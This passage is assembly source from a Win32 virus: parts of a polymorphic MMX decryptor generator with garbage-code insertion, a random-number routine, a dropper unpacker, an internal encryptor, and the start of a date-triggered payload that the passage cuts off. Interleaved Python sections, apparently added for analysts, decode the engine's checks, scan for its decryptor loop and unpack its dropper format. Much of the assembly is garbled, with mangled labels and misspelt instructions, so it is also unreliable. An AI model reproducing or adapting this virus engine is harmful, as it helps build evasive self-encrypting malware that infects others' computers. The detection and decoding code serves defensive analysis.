MOV Al, 0dH; or Eax, -1

Stosb; And Eax, 1

XOR EAX, EAX

Dec EAX

Stosd

MOV Al, 25h

Stosb

XOR EAX, EAX

INC EAX

Stosd

JMP @@ C4mmx_Over_a

@@c4mmx_a_@@3:

Mov Eax, 9058016ah; Push 01

Stosd; POP EAX

Dec Edi

JMP @@ C4mmx_Over_a

@@c4mmx_a_@@2:

XOR EAX, EAX

Call @@ gen_zero_reg; Zero EAX

MOV Al, 40h; Inc EAX

Stosb

JMP @@ C4mmx_Over_a

@@c4mmx_a_@@1:

mov al, 0B8h ; mov eax, 1

stosb

XOR EAX, EAX

INC EAX

Stosd

@@ c4mmx_over_a:

Call @@ gen_garbage

MOV AX, 0A20FH; CPUID

Stosw

Call @@ clean_mask

mov byte ptr [ebp+@@reg_mask], _edx

Call @@ gen_garbage

Mov Eax, 03h

Call R_Range

OR EAX, EAX

jz @@c4mmx_b_@@3

dec eax

jz @@c4mmx_b_@@2

@@c4mmx_b_@@1:

MOV EAX, 17E2BA0FH; BT EDX, 17h

Stosd; JC $ ??

MOV Al, 72H

Stosb

JMP @@ c4mmx_over_b

@@c4mmx_b_@@2:

MOV EAX, 0000C2F7H; Test EDX, 00400000H

Stosd; jz $ ??

Mov Eax, 00740040h

Stosd

Dec Edi

JMP @@ c4mmx_over_b

@@c4mmx_b_@@3:

MOV Eax, 7218EAC1H; SHR EDX, 18H

Stosd; JC $ ??

@@ c4mmx_over_b:

Push EDI

INC EDI; FAKE DATA for Temp. Fail

Call @@ gen_garbage

MOV Al, 0e9h; RET

Stosb

MOV DWORD PTR [EBP @@ ptrto2nd], EDI

XOR EAX, EAX

Stosd

Call @@ gen_garbage

POP EBX

Mov Edx, EDI

Sub EDX, EBX

Dec edx

MOV BYTE PTR [EBX], DL

Inc Byte PTR [EBP @@ init_mmx?]

or word ptr [ebp+@@flags], _check4mmx

RET
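Added here as an analysis aid, not code from the page: a Python decoder for the three CPUID-result tests that @@gen_check4mmx above can emit (`bt edx,17h / jc`, `test edx,00400000h / jz`, `shr edx,18h / jc`), reporting which EDX bit each form really examines and whether the branch that skips the jmp to the non-MMX decryptor is taken when that bit is set. Run on the page's own encodings it shows the `bt` and `shr` forms agree (bit 23, the MMX flag), while the `test` form examines bit 22 with the opposite branch polarity, so an emulator stepping this sample must model each form rather than treat them as interchangeable; the function and constant names are mine.

```python
MMX_BIT = 23   # CPUID.01h:EDX bit 23 is the MMX feature flag


def decode_mmx_check(code: bytes):
    """Return (tested_bit, taken_when_set) for one of the three idioms the
    engine writes after CPUID, or None if the bytes are not one of them.
    The rel8 displacement after the branch opcode is not inspected: the
    engine patches it afterwards (see @@c4mmx_over_b)."""
    # Form 1: 0F BA E2 ib = bt edx, ib ; 72 = jc  -> CF = bit ib
    if len(code) >= 5 and code[:3] == b"\x0f\xba\xe2" and code[4] == 0x72:
        return code[3], True
    # Form 2: F7 C2 id = test edx, id ; 74 = jz -> taken when masked bits are clear
    if len(code) >= 7 and code[:2] == b"\xf7\xc2" and code[6] == 0x74:
        mask = int.from_bytes(code[2:6], "little")
        if mask == 0 or mask & (mask - 1):   # not a single-bit mask
            return None
        return mask.bit_length() - 1, False
    # Form 3: C1 EA ib = shr edx, ib ; 72 = jc -> CF = bit (ib - 1)
    if len(code) >= 4 and code[:2] == b"\xc1\xea" and code[3] == 0x72:
        return (code[2] - 1, True) if code[2] else None
    return None


def is_sound_mmx_check(code: bytes) -> bool:
    """True only if the snippet takes the MMX path exactly when bit 23 is set."""
    return decode_mmx_check(code) == (MMX_BIT, True)


# Encodings as the page writes them; the trailing 00 is the unpatched rel8 slot.
FORM_BT = bytes.fromhex("0fbae21772" "00")          # bt edx,17h ; jc
FORM_TEST = bytes.fromhex("f7c200004000" "74" "00")  # test edx,00400000h ; jz
FORM_SHR = bytes.fromhex("c1ea18" "72" "00")         # shr edx,18h ; jc

if __name__ == "__main__":
    for name, form in (("bt", FORM_BT), ("test", FORM_TEST), ("shr", FORM_SHR)):
        print(name, decode_mmx_check(form), "sound" if is_sound_mmx_check(form) else "differs")
```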

; Generate a routine to get the pseudo delta-offset, which will look like
; this one:
;
;       call    @@1
;       [...]
; @@1:  pop     reg

@@ gen_deltaoffset:

Mov Eax, 10h

Call R_Range

XCHG EAX, EBX

Mov al, 0e8h

Stosb

XOR EAX, EAX

Stosd

MOV DWORD PTR [EBP @@ Tmp_Call], EDI

Call @@ gen_garbage

MOV ECX, DWORD PTR [EBP @@Tmp_call]

MOV EBX, EDI

SUB EBX, ECX

MOV [ECX-4], EBX

MOV Al, 58H

Add Al, Byte PTR [EBP @@reg_delta]

Stosb

MOV EBX, DWORD PTR [EBP @@ ptr_buffer]

SUB ECX, EBX

MOV DWORD PTR [EBP @@ fix1], ECX

or word ptr [ebp+@@flags], _deltaoffset

ret

; Generate a routine to put in the register used as counter the size of the
; code we want to decrypt

@@ gen_loadsize:

or word ptr [ebp+@@flags], _loadsize

MOV Eax, 2

Call R_Range

XCHG EAX, ECX

jecxz @@gls_@@2

@@gls_@@1:

MOV Al, 68H; Push Size

Stosb; Pop Reg_Size

MOV DWORD PTR [EBP @@ size_address], EDI

MOV EAX, DWORD PTR [EBP @@ size2cryptd4]

Stosd

Call @@ gen_garbage

MOV Al, 58H

Add Al, Byte PTR [EBP @@reg_counter]

Stosb

RET

@@gls_@@2:

Movzx Eax, Byte Ptr [EBP @@reg_counter]

Add Eax, 0B8H; Mov Reg_Size, SIZE

Stosb

MOV DWORD PTR [EBP @@ size_address], EDI

MOV EAX, DWORD PTR [EBP @@ size2cryptd4]

Stosd

RET

; Generate the code that will make the pointer register point exactly to
; the beginning of the code we want to encrypt or decrypt

@@ gen_loadpointer:

Mov Eax, Limit

Sub Eax, DWORD PTR [EBP @@ fix1]

MOV DWORD PTR [EBP @@ fix2], EAX

Mov Eax, 03h

Call R_Range

OR EAX, EAX

jz @@lp_@@3

dec eax

jz @@lp_@@2

@@lp_@@1:

MOV Al, 8DH; Lea REG_PTR, [REG_DELTA FIX]

Stosb

Movzx Eax, Byte Ptr [EBP @@ reg_ptr2data]

SHL Al, 3

Add Al, 10000000B

Add Al, Byte PTR [EBP @@reg_delta]

Stosb

JMP @@ lp_

@@lp_@@2:

MOV Al, 8bh; Mov Reg_ptr, Reg_Delta

Stosb; add reg_ptr, fix

Movzx Eax, Byte Ptr [EBP @@ reg_ptr2data]

SHL EAX, 3

OR Al, Byte PTR [EBP @@reg_delta]

OR Al, 11000000B

Stosb

Call @@ gen_garbage

MOV Al, 81H

Stosb

MOV Al, 0C0H

or al, byte ptr [ebp+@@reg_ptr2data]

stosb

JMP @@ lp_

@@lp_@@3:

Call @@ clean_mask; mov reg_mask, fix2

Call @@ get_register; lea reg_ptr, [REG_MASK REG_DELTA (FIX FIX2)]

MOV BYTE PTR [EBP @@ reg_mask], Al

Add Al, 0B8H

Stosb

Call Random

Stosd

Push EAX

Call @@ gen_garbage

POP EDX

Sub DWORD PTR [EBP @@ fix2], EDX

MOV Al, 8DH

Stosb

Movzx Eax, Byte Ptr [EBP @@ reg_ptr2data]

SHL EAX, 3

OR Al, 10000100B

Stosb

Movzx Eax, Byte Ptr [EBP @@ reg_mask]

SHL EAX, 3

OR Al, Byte PTR [EBP @@reg_delta]

Stosb

@@ lp_:

MOV EAX, DWORD PTR [EBP @@ fix2]

Stosd

or word ptr [ebp+@@flags], _loadpointer

RET

; Put in the register used as key the number used for the encryption of the
; virus code.

@@ gen_loadkey:

MOV Eax, 2

Call R_Range

XCHG EAX, ECX

jecxz @@glk_@@2

@@glk_@@1:

MOV Al, 68H; Push Enc_Key

Stosb; Pop Reg_Key

MOV EAX, DWORD PTR [EBP @@ enc_key]

Stosd

Call @@ gen_garbage

MOV Al, 58H

Add Al, Byte PTR [EBP @@reg_key]

Stosb

or word ptr [ebp+@@flags], _loadkey

RET

@@glk_@@2: ; mov key_reg, enc_key

Movzx Eax, Byte Ptr [EBP @@ reg_key]

Add Eax, 0B8H

Stosb

MOV EAX, DWORD PTR [EBP @@ enc_key]

Stosd

or word ptr [ebp+@@flags], _loadkey

RET

; Generate the code to pass the encryption key to an MMX register

@@ gen_passkey2mmx:

MOV AX, 6E0FH; MOV MMX_Key, Reg_Key

Stosw

Movzx Eax, Byte Ptr [EBP @@ mmx_key]

SHL EAX, 3

OR Al, Byte PTR [EBP @@reg_key]

OR Al, 11000000B

Stosb

or word ptr [ebp+@@flags], _passkey2mmx

ret

; Just for Know Where We Must loop The Decryptor

@@ getLoopAddress:

MOV DWORD PTR [EBP @@ l00paddress], EDI

RET

; Pass the dword of code we are decrypting to the MMX register used for that
; matter

@@ gen_passptr2mmx:

MOV AX, 6E0FH; MOV MMX_PTR, [REG_PTR]

Stosw

Movzx Eax, Byte Ptr [EBP @@ mmx_ptr2data]

SHL EAX, 3

OR Al, Byte PTR [EBP @@ reg_ptr2data]

Stosb

Or Word PTR [EBP @@ flags], _ Passptr2mmx

RET

; Generate the MMX encryption opcode:
;   PXOR

@@ gen_crypt_instructions:

MOV AX, 0EF0FH; PXOR MMX_PTR, MMX_Key

Stosw

Movzx Eax, Byte Ptr [EBP @@ mmx_ptr2data]

SHL EAX, 3

OR Al, Byte PTR [EBP @@ mmx_key]

OR Al, 11000000B

Stosb

Or Word PTR [EBP @@ flags], _ Crypt

RET

; Generate the alternative method of MMX encryption code:
;   PXOR = XOR

@@ gen_non_mmx_crypt_instructions:

MOV AX, 0031H; XOR [REG_PTR], REG_KEY

Movzx EBX, Byte Ptr [EBP @@ reg_key]

SHL EBX, 3

OR BL, BYTE PTR [EBP @@ reg_ptr2data]

OR AH, BL

Stosw

RET

; Generate the code that will pass the already decrypted data back to its original position

@@ gen_passmmx2ptr:

MOV AX, 7E0FH; MOVD [REG_PTR], (MMX_PTR XOR MMX_KEY)

Stosw

Movzx Eax, Byte Ptr [EBP @@ mmx_ptr2data]

SHL EAX, 3

OR Al, Byte PTR [EBP @@ reg_ptr2data]

Stosb

Or Word PTR [EBP @@ flags], _ Passmmx2Ptr

RET

; Select the order between increasing the pointer and decreasing the counter

@@ gen_incpointer_deccounter:

MOV Eax, 2

Call R_Range

XCHG EAX, ECX

Jecxz @@gdc_gip

@@ gip_gdc:

Call @@ge_incpointer

Call @@ gen_some_garbage

Call @@ gen_deccounterret

@@gdc_gip:

Call @@ gen_deccounter

Call @@ gen_some_garbage

Call @@ge_incpointer

RET

; Generate the code that makes the pointer register point to the next dword

@@ gen_incpointer:

MOV Eax, 5

Call R_Range

XCHG EAX, ECX

JECXZ @@gip _ @@ 2

Dec ECX

JZ @@gip _ @@ 3

Dec ECX

JZ @@gip _ @@ 4

Dec ECX

JNZ @@gip _ @@ 1

JMP @@gip _ @@ 5

@@gip _ @@ 1:

MOV BL, 4; Add Reg_ptr, 4

Call @@ gip_addit

JMP @@ gip_exit

@@gip _ @@ 2:

MOV Eax, 2

Call R_Range

XCHG EAX, ECX

Jecxz @@gip _ @@ 2 _ @@ 2

@@gip _ @@ 2 _ @@ 1:

MOV BL, 3; Add Reg_ptr, 3

Call @@ gip_addit

Call @@ gen_garbage

MOV BL, 1; Inc REG_PTR

Call @@gip_incit

JMP @@gip _ @@ 2_exit

@@gip _ @@ 2 _ @@ 2:

MOV BL, 1; Inc REG_PTR

Call @@gip_incit

Call @@ gen_garbage

MOV BL, 3

Call @@ gip_addit; add reg_ptr, 3

@@gip _ @@ 2_exit:

JMP @@ gip_exit

@@gip _ @@ 3:

MOV Eax, 2

Call R_Range

XCHG EAX, ECX

Jecxz @@gip _ @@ 3 _ @@ 2

@@gip _ @@ 3 _ @@ 1:

MOV BL, 2; add reg_ptr, 2

Call @@ gip_addit

Call @@ gen_garbage

MOV BL, 2; Inc REG_PTR

Call @@ gip_incit; increg_ptr

JMP @@gip _ @@ 2_exit

@@gip _ @@ 3 _ @@ 2:

MOV BL, 2; Inc REG_PTR

Call @@ gip_incit; increg_ptr

Call @@ gen_garbage

MOV BL, 2; add reg_ptr, 2

Call @@ gip_addit

JMP @@gip _ @@ 2_exit

@@gip _ @@ 4:

MOV Eax, 2

Call R_Range

XCHG EAX, ECX

Jecxz @@gip _ @@ 4 _ @@ 2 @@ gip _ @@ 4 _ @@ 1:

MOV BL, 1; Add Reg_ptr, 1

Call @@ gip_addit; increg_ptr

Call @@ gen_garbage

MOV BL, 3; Inc REG_PTR

Call @@ gip_incit; increg_ptr

JMP @@gip _ @@ 2_exit

@@gip _ @@ 4 _ @@ 2:

MOV BL, 1; Inc REG_PTR

Call @@ gip_incit; increg_ptr

Call @@ gen_garbage

MOV BL, 3; Inc REG_PTR

Call @@ gip_addit; add reg_ptr, 1

JMP @@gip _ @@ 2_exit

@@gip _ @@ 5:; increg_ptr

MOV BL, 4; Inc Reg_ptr

Call @@ gip_incit; increg_ptr

; Increg_ptr

@@ gip_exit:

Or Word PTR [EBP @@ flags], _ IncPointer

RET

@@ gip_addit:

MOV Al, 83H

Stosb

Mov Al, Byte Ptr [EBP @@reg_ptr2data]

OR Al, 11000000B

Stosb

MOV Al, BL

Stosb

RET

@@ gip_incit:

Movzx ECX, BL

MOV Al, 40h

Add Al, Byte PTR [EBP @@reg_ptr2data]

@@ gip_ii_loop:

Stosb

PUSH ECX EAX

Call @@ gen_garbage

POP EAX ECX

Loop @@ gip_ii_loop

RET

; Generate the code that decrements the counter by one

@@ gen_deccounter:

Mov Eax, 3

Call R_Range

XCHG EAX, ECX

Jecxz @@gdc _ @@ 2

Dec ECX

JECXZ @@gdc _ @@ 3

@@gdc _ @@ 1:

MOV Al, 83h; Sub Reg_Size, 1

Stosb

MOV Al, Byte PTR [EBP @@reg_counter]

OR Al, 11101000B

Stosb

MOV Al, 1

Stosb

JMP @@gdc_exit

@@gdc _ @@ 2:

MOV Al, 48H; Dec Reg_Size

Add Al, Byte PTR [EBP @@reg_counter]

Stosb

JMP @@gdc_exit

@@gdc _ @@ 3:

MOV Al, 83h; add reg_size, -1

Stosb

MOV Al, Byte PTR [EBP @@reg_counter]

OR Al, 11000000B

Stosb

MOV Al, 0FFH

Stosb

@@gdc_exit: or word PTR [EBP @@ flags], _ Deccounter

RET

Generate the loop-alike thingy

@@ gen_loop:

Mov Eax, 04h

Call R_Range

OR EAX, EAX

JZ @@gl _ @@ 3

Dec EAX

JZ @@gl _ @@ 2

Dec EAX

JZ @@ GL _ @@ 1

@@ GL _ @@ 0:

MOV Al, 83H; Cmp REG_SIZE, 00H

Stosb

Movzx Eax, Byte Ptr [EBP @@reg_counter]

OR Al, 11111000B

Stosb

XOR EAX, EAX

Stosb

JMP @@gl_dojnz

@@ GL _ @@ 1:

MOV Al, 83H; CMP reg_size, -1

Stosb

Movzx Eax, Byte Ptr [EBP @@reg_counter]

OR Al, 11111000B

Stosb

XOR EAX, EAX

Dec EAX

Stosb

MOV EAX, DWORD PTR [EBP @@ size_address]

Dec dword PTR [EAX]

JMP @@gl_dojnz

@@ GL _ @@ 2:

MOV Al, 0BH; or reg_size, reg_size

Stosb

Movzx Eax, Byte Ptr [EBP @@reg_counter]

SHL EAX, 3

OR Al, Byte PTR [EBP @@reg_counter]

OR Al, 11000000B

Stosb

JMP @@gl_dojnz

@@ GL _ @@ 3:

MOV Al, 85H

Stosb

Movzx Eax, Byte Ptr [EBP @@ reg_counter]; test reg_size, reg_size

SHL EAX, 3

OR Al, Byte PTR [EBP @@reg_counter]

OR Al, 11000000B

Stosb

MOV EAX, DWORD PTR [EBP @@ size_address]

Dec dword PTR [EAX]

@@ GL_DOJNZ:

MOV AX, 850FH; JNZ loop_address

Stosw

MOV EAX, DWORD PTR [EBP @@ l00paddress]

Sub Eax, EDI

Sub Eax, 00000004H

Stosd

Or Word PTR [EBP @@ flags], _ loop

RET

; --- Garbage Generator's Table

@@gbgtbl label byte

DD Offset (@@ do_Anything); OH, My Lazy Engine! :)

DD Offset (@@ gen_arithmetic_reg32_reg32)

DD Offset (@@ gen_arithmetic_reg32_imm32)

DD Offset (@@ gen_arithmetic_eax_imm32)

DD offset (@@ gen_mov_reg32_imm32)

DD offset (@@ gen_mov_reg8_imm8)

DD offset (@@ gen_call_to_subroutine)

DD Offset (@@ gen_push_garbage_pop)

DD offset (@@ gen_zer0_reg)

DD Offset (@@ gen_arithmetic_reg32_reg32)

DD Offset (@@ gen_arithmetic_reg32_imm32)

DD Offset (@@ gen_arithmetic_eax_imm32)

DD offset (@@ gen_mov_reg32_imm32)

DD offset (@@ gen_mov_reg8_imm8)

@@ non_mmx_gbg EQU (($ -offset @@ GBGTBL) / 4)

; MMX garbage generatorz

DD Offset (@@ gen_onebyter); for security, it's here

DD offset (@@ gen_mmx_group1)

DD Offset (@@ gen_mmx_group2)

DD offset (@@ gen_mmx_group3)

DD offset (@@ gen_mmx_movq_mm? _mm?)

DD OFFSET (@@ gen_mmx_movd_mm? _reg32)

@@ s_gbgtbl EQU (($ -offset @@ GBGTBL) / 4)

; MMX version

@@After_looptbl Label Byte

DD offset (@@ gen_passptr2mmx); /

DD Offset (@@ gen_crypt_instruction;> - Must Follow this Order

DD Offset (@@ gen_passmmmx2ptr); /

DD Offset (@@ gen_incpointer_deccounter)

DD Offset (@@ gen_loop)

@@ s_aftlooptbl EQU ($ -offset @@After_LoopTBL) / 4)

; Non-MMX version

@@After_l00ptbl label byte

DD offset (@@ gen_non_mmx_crypt_instructions)

DD Offset (@@ gen_incpointer_deccounter)

DD Offset (@@ gen_loop)

@@ s_aftl00ptbl EQU ($ -offset @@After_L00PTBL) / 4)

MMXE_END LABEL BYTE

MMXE ENDP
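The three fixed opcodes the generator emits (MOVD mm,[reg] from gen_passptr2mmx, PXOR mm,mm from gen_crypt_instructions and MOVD [reg],mm from gen_passmmx2ptr) survive every register choice and every garbage insertion, which is what a defender can key on. The Python scanner below is an added example written for this page, not code from the virus or its author: it looks for those three opcode prefixes inside a small window and checks that their ModRM fields agree on the pointer register and the MMX registers before reporting a candidate decryptor loop. The byte samples are constructed, and the window size and the Match fields are my own assumptions; a hit is a triage signal to confirm in a disassembler, not a verdict.

```python
"""Heuristic detector for the fixed MMX load / PXOR / store skeleton."""
from dataclasses import dataclass
from typing import List, Optional

# Opcode prefixes the generator always emits, whatever registers it picks:
MOVD_MM_RM32 = b"\x0f\x6e"   # MOVD mm, r/m32   (gen_passptr2mmx)
PXOR_MM_MM = b"\x0f\xef"     # PXOR mm, mm/m64  (gen_crypt_instructions)
MOVD_RM32_MM = b"\x0f\x7e"   # MOVD r/m32, mm   (gen_passmmx2ptr)

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


@dataclass
class Match:
    offset: int    # offset of the MOVD load inside the scanned buffer
    ptr_reg: int   # general register used as data pointer (ModRM r/m field)
    data_mm: int   # MMX register receiving the dword being decrypted
    key_mm: int    # MMX register holding the key
    span: int      # bytes from the load to the end of the store


def _modrm(b: int):
    """Split a ModRM byte into (mod, reg, rm)."""
    return b >> 6, (b >> 3) & 7, b & 7


def find_mmx_xor_loops(code: bytes, window: int = 64) -> List[Match]:
    """Return every load/PXOR/store triple whose registers are consistent.

    Garbage instructions may sit between the three real ones, so the scan is
    byte-oriented and only checks the ModRM fields for consistency. It is a
    triage heuristic, not a disassembler (assumed window: 64 bytes).
    """
    matches: List[Match] = []
    n = len(code)
    for i in range(n - 2):
        if code[i:i + 2] != MOVD_MM_RM32:
            continue
        mod, data_mm, ptr_reg = _modrm(code[i + 2])
        # The generator encodes a plain [reg] operand: mod=00, and rm 100/101
        # would mean a SIB byte or disp32 rather than a base register.
        if mod != 0 or ptr_reg in (4, 5):
            continue
        limit = min(n, i + 3 + window)

        # PXOR data_mm, key_mm in register-register form (mod=11).
        key_mm: Optional[int] = None
        j = i + 3
        while j + 2 < limit:
            if code[j:j + 2] == PXOR_MM_MM:
                pmod, preg, prm = _modrm(code[j + 2])
                if pmod == 3 and preg == data_mm and prm != data_mm:
                    key_mm = prm
                    break
            j += 1
        if key_mm is None:
            continue

        # MOVD [ptr_reg], data_mm writes the decrypted dword back in place.
        k = j + 3
        while k + 2 < limit:
            if code[k:k + 2] == MOVD_RM32_MM:
                smod, sreg, srm = _modrm(code[k + 2])
                if smod == 0 and sreg == data_mm and srm == ptr_reg:
                    matches.append(Match(i, ptr_reg, data_mm, key_mm, k + 3 - i))
                    break
            k += 1
    return matches


def describe(m: Match) -> str:
    """Render a match as the three instructions it stands for."""
    ptr = REG32[m.ptr_reg]
    return (f"movd mm{m.data_mm},[{ptr}] ... pxor mm{m.data_mm},mm{m.key_mm}"
            f" ... movd [{ptr}],mm{m.data_mm}")


# Constructed sample of one loop body with garbage between the real steps:
# movd mm0,[esi]; nop; mov eax,11223344h; pxor mm0,mm1; inc ecx;
# movd [esi],mm0; add esi,4; dec ecx; jnz back to the top.
SAMPLE_HIT = bytes([
    0x0F, 0x6E, 0x06,                    # movd mm0, [esi]
    0x90, 0xB8, 0x44, 0x33, 0x22, 0x11,  # garbage: nop; mov eax, 11223344h
    0x0F, 0xEF, 0xC1,                    # pxor mm0, mm1
    0x41,                                # garbage: inc ecx
    0x0F, 0x7E, 0x06,                    # movd [esi], mm0
    0x83, 0xC6, 0x04,                    # add esi, 4
    0x49,                                # dec ecx
    0x0F, 0x85, 0xE6, 0xFF, 0xFF, 0xFF,  # jnz rel32 (-26, back to offset 0)
])
# Constructed negative: a load and a store with no PXOR in between.
SAMPLE_MISS = bytes([0x0F, 0x6E, 0x06, 0x90, 0x0F, 0x7E, 0x06])

if __name__ == "__main__":
    for hit in find_mmx_xor_loops(SAMPLE_HIT):
        print(f"offset {hit.offset}: {describe(hit)} ({hit.span} bytes)")
```

Because the non-MMX fallback (gen_non_mmx_crypt_instructions) emits a plain XOR [reg],reg, it does not trip this scanner; that variant needs a separate signature, and in both cases the JNZ rel32 emitted by gen_loop can be used to bound the loop body.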

=: =: =: =: =: =: =: =: =: =: =: =: =: =: =: =: =: =: = : =: =: =: =: =: =: =: =: =: =: =: =: =

Random Procedures

=: =: =: =: =: =: =: =: =: =: =: =: =: =: =: =: =: =: = =: =: =: =: =: =: =: =: =: =: =: =

Random

;

Input:

Nothing.

Output:

EAX = Random Number

;

Random Proc; Thanx Mdriller!;)

Push ECX

MOV EAX, DWORD PTR [EBP RND_SEED1]

Dec DWORD PTR [EBP RND_SEED1]]

XOR EAX, DWORD PTR [EBP RND_SEED2]

MOV ECX, EAX

ROL DWORD PTR [EBP RND_SEED1], CL

Add DWORD PTR [EBP RND_SEED2], EAX

ADC EAX, DWORD PTR [EBP RND_SEED2]

Add Eax, ECX

Ror Eax, Cl

NOT EAX

Sub Eax, 3

XOR DWORD PTR [EBP RND_SEED2], EAX

XOR EAX, DWORD PTR [EBP RND_SEED3]

ROL DWORD PTR [EBP RND_SEED3], 1

Sub DWORD PTR [EBP RND_SEED3], ECX

SBB DWORD PTR [EBP RND_SEED3], 4

INC DWORD PTR [EBP RND_SEED2]

POP ECX

RET

Random ENDP

R_RANGE

;

Input:

EAX = Number of Possible Random Numbers

Output:

EAX = Number Between 0 and (eax-1)

R_RANGE PROC

Push ECX

Push Edx

MOV ECX, EAX

Call Random

XOR EDX, EDX

Div ECX

MOV EAX, EDX

POP EDX

POP ECX

RET

R_RANGE ENDP

[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []

; || Dropper Unpacker (22 Bytes) ||

[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []

;

Even more optimized version of the one in win32.thorin!

;

; [LSCE] - The Little and Shitty Compression Engine

;

; This is a very simple packing engine, based on the repetition of zeros that
; PE files have, thus it is able to compress a PE file... Hehehe, I can put a
; dropper without caring about its space! That was the only reason for making
; this little shit. Maybe one day I will make a 'real' compression engine, but
; today I'm too busy :)

;

Input:

; EDI = offset where to unpack

ESI = Data To Unpack

ECX = Size of Packed Data

Output:

Nothing.

;

LSCE_UNPACK PROC

Lodsb; 1 Byte Whoa! I'VE

OR Al, Al; 2 Bytes Optimized Some

JNZ Store_Byte; 2 bytes more bytes,

Dec Ecx; 1 byte and super

Dec Ecx; 1 byte helped me with

Lodsw; 2 Bytes One! I've Done

CWDE; 1 byte the rest! :)

Push ECX; 1 Byte

XOR ECX, ECX; 2 Bytes

XCHG EAX, ECX; 1 Byte

Rep stosb; 2 bytes

POP ECX; 1 Byte

Test Al, 00h; 1 Byte

Org $ -1

Store_byte:

Stosb; 1 Byte

Loop lsce_unpack; 2 bytes

Ret; 1 bytes

LSCE_UNPACK ENDP
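The 22-byte routine above defines a stream in which a non-zero byte is a literal and a zero byte is followed by a 16-bit run count of zero bytes. The Python decoder below is an added example, not the author's code: it implements that grammar for an analyst who needs to expand a dropper recovered from an infected file, together with a constructed reference encoder for round-trip checks; the sample data and the function names are mine. It also makes the CWDE sign-extension limit explicit: a count of 0x8000 or more is rejected rather than silently misread.

```python
"""Decoder (and a reference encoder) for the LSCE zero-run stream."""


def lsce_unpack(packed: bytes) -> bytes:
    """Expand an LSCE stream.

    Grammar, read from the 22-byte routine: a non-zero byte is copied as-is;
    a zero byte is followed by a little-endian 16-bit count and stands for
    that many zero bytes.
    """
    out = bytearray()
    i, n = 0, len(packed)
    while i < n:
        b = packed[i]
        i += 1
        if b != 0:
            out.append(b)
            continue
        if i + 2 > n:
            raise ValueError(f"truncated run header at offset {i - 1}")
        run = int.from_bytes(packed[i:i + 2], "little")
        i += 2
        # The original reads the count with LODSW/CWDE, i.e. sign-extended:
        # a count of 0x8000 or more becomes a huge negative REP count and
        # would overrun the output buffer, so such streams are rejected here.
        if run >= 0x8000:
            raise ValueError(f"run length {run:#x} exceeds what the original decoder handles")
        out.extend(bytes(run))
    return bytes(out)


def lsce_pack(data: bytes) -> bytes:
    """Constructed reference encoder for round-trip checks; long zero runs
    are split so every count stays below 0x8000 (see the CWDE note above)."""
    out = bytearray()
    i, n = 0, len(data)
    while i < n:
        if data[i] != 0:
            out.append(data[i])
            i += 1
            continue
        j = i
        while j < n and data[j] == 0 and j - i < 0x7FFF:
            j += 1
        out.append(0)
        out.extend((j - i).to_bytes(2, "little"))
        i = j
    return bytes(out)


# Constructed sample resembling a PE header region: a few non-zero bytes
# separated by the long zero padding the author relies on.
SAMPLE = b"MZ\x90\x00" + bytes(300) + b"PE\x00\x00" + bytes(5)

if __name__ == "__main__":
    packed = lsce_pack(SAMPLE)
    print(len(SAMPLE), "->", len(packed), "bytes; round trip ok:",
          lsce_unpack(packed) == SAMPLE)
```

Note that the format has no length field and no checksum: the decoder trusts the packed-size register entirely, so an analyst running it on carved data should bound the output size rather than rely on the stream to terminate cleanly.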

[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []

; || [ienc] - Internal Encryptor Engine V1.00 ||

[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []

;

Ienc_encrypt

;

Input:

ESI = Pointer to Ienc Structure

; EDI = Pointer to where Virus Will Be appended

Output:

Nothing

;

Ienc_encrypt Proc

Lodsw

CWDE

XCHG EAX, ECX

Lodsw

CWDE

Add Eax, EDI

XCHG EAX, EDX

Call Random

IENC_ENCL00P:

XOR BYTE PTR [EDX], Al

Inc EDX

Loop Ienc_ENCL00P

CMP Byte PTR [ESI], BILLY_BEL

JNZ Ienc_Encrypt

RET

Ienc_encrypt ENDP

DB 00H, "[Ienc v1.00]", 00h

Ienc_decrypt

;

Input:

Nothing.

Output:

Nothing.

;

Ienc_Decrypt Proc

Pushad; save all registers

Pushfd; save flag

MOV Eax, [ESP 24h]; EAX = RETURN Address

MOV EBX, [EAX]; EBX = CRC32

MOV ECX, [EAX 04H]; ECX = Size of Block

Add Eax, 08h; Eax = Ptr To Block

CDQ; EDX = 0

Ienc_l00p:

Pushhad; Preserve All Registers

Push EAX ECX

Ienc_subl00p:

XOR BYTE PTR [EAX], DL; XOR A BYTE

Inc Eax; Point to Next One

Loop Ienc_subl00p; and try it too

POP EDI ESI

Call CRC32; Do The CRC's match?

CMP EAX, EBX

Popad

JZ Ienc_ok; if SO, All IS OK.

Pushhad

Ienc_subl00p2:

XOR BYTE PTR [EAX], DL; Reencrypt: Doesn't Match

INC EAX

Loop Ienc_subl00p2

Popad

Inc EDX; TRY with ANOTHER Key

JMP Ienc_L00P

Ienc_ok:

POPFD; Restore Flags

Popad; Restore Registers

Add DWORD PTR [ESP], 08H; FIX RETURN ADDRESS

Ret; PFFF!

Ienc_Decrypt endp

[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []

; || Virus payload ||

[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []

PayLoad Proc

Call Ienc_Decrypt

DD 00000000h

DD EBLOCK13-Block13

Block13 Label Byte

Lea Eax, [EBP SystemTime]; Get Day, Month, ETC

Push EAX

Apicall_getsystemtime

CMP Word PTR [EBP ST_WMONTH], NMONTH; IS JULY?

JNZ NO_PAYLOAD

CMP Word PTR [EBP ST_WDAY], NDAY; IS 31?

JNZ NO_PAYLOAD

Push 00001000H; Kewl! show copyrightz msgs

Lea EBX, [EBP SZTTL]

Push EBX

LEA EBX, [EBP SZMSG]

Push EBX

Push 00000000H

Apicall_MessageBoxa

Lea Eax, [EBP DISPSITION]; make a little trick for the

Push Eax; Explorer ...

Lea Eax, [EBP Reghandle]

Push EAX

XOR EAX, EAX

Push EAX

